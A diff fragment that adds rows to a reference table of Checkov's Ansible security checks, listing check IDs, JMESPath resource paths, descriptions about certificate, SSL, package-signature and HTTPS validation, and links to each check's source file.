+|   50 | CKV_ANSIBLE_1            | resource                         | [].block[].block[].block[?"uri" != null][]                                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
+|   51 | CKV_ANSIBLE_1            | resource                         | [].tasks[?"ansible.builtin.uri" != null][]                                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
+|   52 | CKV_ANSIBLE_1            | resource                         | [].tasks[?"uri" != null][]                                                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
+|   53 | CKV_ANSIBLE_1            | resource                         | [].tasks[].block[?"ansible.builtin.uri" != null][]                                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
+|   54 | CKV_ANSIBLE_1            | resource                         | [].tasks[].block[?"uri" != null][]                                                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
+|   55 | CKV_ANSIBLE_1            | resource                         | [].tasks[].block[].block[?"ansible.builtin.uri" != null][]                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
+|   56 | CKV_ANSIBLE_1            | resource                         | [].tasks[].block[].block[?"uri" != null][]                                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
+|   57 | CKV_ANSIBLE_1            | resource                         | [].tasks[].block[].block[].block[?"ansible.builtin.uri" != null][]                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
+|   58 | CKV_ANSIBLE_1            | resource                         | [].tasks[].block[].block[].block[?"uri" != null][]                                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                                 |
+|   59 | CKV_ANSIBLE_2            | resource                         | [?"ansible.builtin.get_url" != null][]                                                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   60 | CKV_ANSIBLE_2            | resource                         | [?"get_url" != null][]                                                                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   61 | CKV_ANSIBLE_2            | resource                         | [].block[?"ansible.builtin.get_url" != null][]                                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   62 | CKV_ANSIBLE_2            | resource                         | [].block[?"get_url" != null][]                                                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   63 | CKV_ANSIBLE_2            | resource                         | [].block[].block[?"ansible.builtin.get_url" != null][]                                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   64 | CKV_ANSIBLE_2            | resource                         | [].block[].block[?"get_url" != null][]                                                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   65 | CKV_ANSIBLE_2            | resource                         | [].block[].block[].block[?"ansible.builtin.get_url" != null][]                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   66 | CKV_ANSIBLE_2            | resource                         | [].block[].block[].block[?"get_url" != null][]                                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   67 | CKV_ANSIBLE_2            | resource                         | [].tasks[?"ansible.builtin.get_url" != null][]                                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   68 | CKV_ANSIBLE_2            | resource                         | [].tasks[?"get_url" != null][]                                                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   69 | CKV_ANSIBLE_2            | resource                         | [].tasks[].block[?"ansible.builtin.get_url" != null][]                                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   70 | CKV_ANSIBLE_2            | resource                         | [].tasks[].block[?"get_url" != null][]                                                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   71 | CKV_ANSIBLE_2            | resource                         | [].tasks[].block[].block[?"ansible.builtin.get_url" != null][]                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   72 | CKV_ANSIBLE_2            | resource                         | [].tasks[].block[].block[?"get_url" != null][]                                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   73 | CKV_ANSIBLE_2            | resource                         | [].tasks[].block[].block[].block[?"ansible.builtin.get_url" != null][]                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   74 | CKV_ANSIBLE_2            | resource                         | [].tasks[].block[].block[].block[?"get_url" != null][]                                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                           |
+|   75 | CKV_ANSIBLE_3            | resource                         | [?"ansible.builtin.yum" != null][]                                                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   76 | CKV_ANSIBLE_3            | resource                         | [?"yum" != null][]                                                                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   77 | CKV_ANSIBLE_3            | resource                         | [].block[?"ansible.builtin.yum" != null][]                                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   78 | CKV_ANSIBLE_3            | resource                         | [].block[?"yum" != null][]                                                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   79 | CKV_ANSIBLE_3            | resource                         | [].block[].block[?"ansible.builtin.yum" != null][]                                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   80 | CKV_ANSIBLE_3            | resource                         | [].block[].block[?"yum" != null][]                                                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   81 | CKV_ANSIBLE_3            | resource                         | [].block[].block[].block[?"ansible.builtin.yum" != null][]                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   82 | CKV_ANSIBLE_3            | resource                         | [].block[].block[].block[?"yum" != null][]                                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   83 | CKV_ANSIBLE_3            | resource                         | [].tasks[?"ansible.builtin.yum" != null][]                                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   84 | CKV_ANSIBLE_3            | resource                         | [].tasks[?"yum" != null][]                                                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   85 | CKV_ANSIBLE_3            | resource                         | [].tasks[].block[?"ansible.builtin.yum" != null][]                                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   86 | CKV_ANSIBLE_3            | resource                         | [].tasks[].block[?"yum" != null][]                                                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   87 | CKV_ANSIBLE_3            | resource                         | [].tasks[].block[].block[?"ansible.builtin.yum" != null][]                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   88 | CKV_ANSIBLE_3            | resource                         | [].tasks[].block[].block[?"yum" != null][]                                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   89 | CKV_ANSIBLE_3            | resource                         | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][]                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   90 | CKV_ANSIBLE_3            | resource                         | [].tasks[].block[].block[].block[?"yum" != null][]                                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                                 |
+|   91 | CKV_ANSIBLE_4            | resource                         | [?"ansible.builtin.yum" != null][]                                                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|   92 | CKV_ANSIBLE_4            | resource                         | [?"yum" != null][]                                                                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|   93 | CKV_ANSIBLE_4            | resource                         | [].block[?"ansible.builtin.yum" != null][]                                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|   94 | CKV_ANSIBLE_4            | resource                         | [].block[?"yum" != null][]                                                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|   95 | CKV_ANSIBLE_4            | resource                         | [].block[].block[?"ansible.builtin.yum" != null][]                                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|   96 | CKV_ANSIBLE_4            | resource                         | [].block[].block[?"yum" != null][]                                                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|   97 | CKV_ANSIBLE_4            | resource                         | [].block[].block[].block[?"ansible.builtin.yum" != null][]                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|   98 | CKV_ANSIBLE_4            | resource                         | [].block[].block[].block[?"yum" != null][]                                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|   99 | CKV_ANSIBLE_4            | resource                         | [].tasks[?"ansible.builtin.yum" != null][]                                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|  100 | CKV_ANSIBLE_4            | resource                         | [].tasks[?"yum" != null][]                                                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|  101 | CKV_ANSIBLE_4            | resource                         | [].tasks[].block[?"ansible.builtin.yum" != null][]                                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|  102 | CKV_ANSIBLE_4            | resource                         | [].tasks[].block[?"yum" != null][]                                                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|  103 | CKV_ANSIBLE_4            | resource                         | [].tasks[].block[].block[?"ansible.builtin.yum" != null][]                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|  104 | CKV_ANSIBLE_4            | resource                         | [].tasks[].block[].block[?"yum" != null][]                                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|  105 | CKV_ANSIBLE_4            | resource                         | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][]                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|  106 | CKV_ANSIBLE_4            | resource                         | [].tasks[].block[].block[].block[?"yum" != null][]                                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                         |
+|  107 | CKV_ANSIBLE_5            | resource                         | [?"ansible.builtin.apt" != null][]                                                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  108 | CKV_ANSIBLE_5            | resource                         | [?"apt" != null][]                                                                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  109 | CKV_ANSIBLE_5            | resource                         | [].block[?"ansible.builtin.apt" != null][]                                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  110 | CKV_ANSIBLE_5            | resource                         | [].block[?"apt" != null][]                                                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  111 | CKV_ANSIBLE_5            | resource                         | [].block[].block[?"ansible.builtin.apt" != null][]                                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  112 | CKV_ANSIBLE_5            | resource                         | [].block[].block[?"apt" != null][]                                                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  113 | CKV_ANSIBLE_5            | resource                         | [].block[].block[].block[?"ansible.builtin.apt" != null][]                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  114 | CKV_ANSIBLE_5            | resource                         | [].block[].block[].block[?"apt" != null][]                                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  115 | CKV_ANSIBLE_5            | resource                         | [].tasks[?"ansible.builtin.apt" != null][]                                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  116 | CKV_ANSIBLE_5            | resource                         | [].tasks[?"apt" != null][]                                                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  117 | CKV_ANSIBLE_5            | resource                         | [].tasks[].block[?"ansible.builtin.apt" != null][]                                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  118 | CKV_ANSIBLE_5            | resource                         | [].tasks[].block[?"apt" != null][]                                                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  119 | CKV_ANSIBLE_5            | resource                         | [].tasks[].block[].block[?"ansible.builtin.apt" != null][]                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  120 | CKV_ANSIBLE_5            | resource                         | [].tasks[].block[].block[?"apt" != null][]                                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  121 | CKV_ANSIBLE_5            | resource                         | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][]                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  122 | CKV_ANSIBLE_5            | resource                         | [].tasks[].block[].block[].block[?"apt" != null][]                                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                                   |
+|  123 | CKV_ANSIBLE_6            | resource                         | [?"ansible.builtin.apt" != null][]                                                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  124 | CKV_ANSIBLE_6            | resource                         | [?"apt" != null][]                                                                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  125 | CKV_ANSIBLE_6            | resource                         | [].block[?"ansible.builtin.apt" != null][]                                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  126 | CKV_ANSIBLE_6            | resource                         | [].block[?"apt" != null][]                                                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  127 | CKV_ANSIBLE_6            | resource                         | [].block[].block[?"ansible.builtin.apt" != null][]                                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  128 | CKV_ANSIBLE_6            | resource                         | [].block[].block[?"apt" != null][]                                                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  129 | CKV_ANSIBLE_6            | resource                         | [].block[].block[].block[?"ansible.builtin.apt" != null][]                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  130 | CKV_ANSIBLE_6            | resource                         | [].block[].block[].block[?"apt" != null][]                                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  131 | CKV_ANSIBLE_6            | resource                         | [].tasks[?"ansible.builtin.apt" != null][]                                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  132 | CKV_ANSIBLE_6            | resource                         | [].tasks[?"apt" != null][]                                                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  133 | CKV_ANSIBLE_6            | resource                         | [].tasks[].block[?"ansible.builtin.apt" != null][]                                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  134 | CKV_ANSIBLE_6            | resource                         | [].tasks[].block[?"apt" != null][]                                                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  135 | CKV_ANSIBLE_6            | resource                         | [].tasks[].block[].block[?"ansible.builtin.apt" != null][]                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  136 | CKV_ANSIBLE_6            | resource                         | [].tasks[].block[].block[?"apt" != null][]                                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  137 | CKV_ANSIBLE_6            | resource                         | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][]                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  138 | CKV_ANSIBLE_6            | resource                         | [].tasks[].block[].block[].block[?"apt" != null][]                                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                                 |
+|  139 | CKV2_ANSIBLE_1           | resource                         | tasks.ansible.builtin.uri                                                                        | Ensure that HTTPS url is used with uri                                                                                                                                                                   | Ansible                 | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml)                                                                                                     |
